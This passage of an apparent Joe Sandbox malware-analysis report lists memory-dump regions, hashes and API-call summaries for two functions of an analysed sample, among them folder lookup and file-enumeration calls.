                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: db8e91ab066f4d7be56426be5ce8ff8a4fad88a61167b3c86ced8b95d0eccfc0
                              • Instruction ID: f884e1c2d962e5a7aede31881fec928b6717b4f90bea706bcd9a7b7b99b346fe
                              • Opcode Fuzzy Hash: db8e91ab066f4d7be56426be5ce8ff8a4fad88a61167b3c86ced8b95d0eccfc0
                              • Instruction Fuzzy Hash: BBF090329093149BDB21BBB85887F5E33A0AF30724F21414DF409E62D2CB64DD409ED6
                              Function 001C4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4F7A
                              • lstrcat.KERNEL32(?,001D1070), ref: 001C4F97
                              • lstrcat.KERNEL32(?,00EE8928), ref: 001C4FAB
                              • lstrcat.KERNEL32(?,001D1074), ref: 001C4FBD
                                • Part of subcall function 001C4910: wsprintfA.USER32 ref: 001C492C
                                • Part of subcall function 001C4910: FindFirstFileA.KERNEL32(?,?), ref: 001C4943
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D0FDC), ref: 001C4971
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D0FE0), ref: 001C4987
                                • Part of subcall function 001C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001C4B7D
                                • Part of subcall function 001C4910: FindClose.KERNEL32(000000FF), ref: 001C4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 880125f1a871651c8212ad4b1a1277deeb05b06d171b9b094e54006f8a2efbda
                              • Instruction ID: 4073f4cbb4cc343189e9a27ccf840b4e857012b93af7b517d675e3339ddf463a
                              • Opcode Fuzzy Hash: 880125f1a871651c8212ad4b1a1277deeb05b06d171b9b094e54006f8a2efbda
                              • Instruction Fuzzy Hash: 4821B6B690020867C755FBA0DC46FF9333CAB69300F404549B68D97181EFB4AAC8CBA2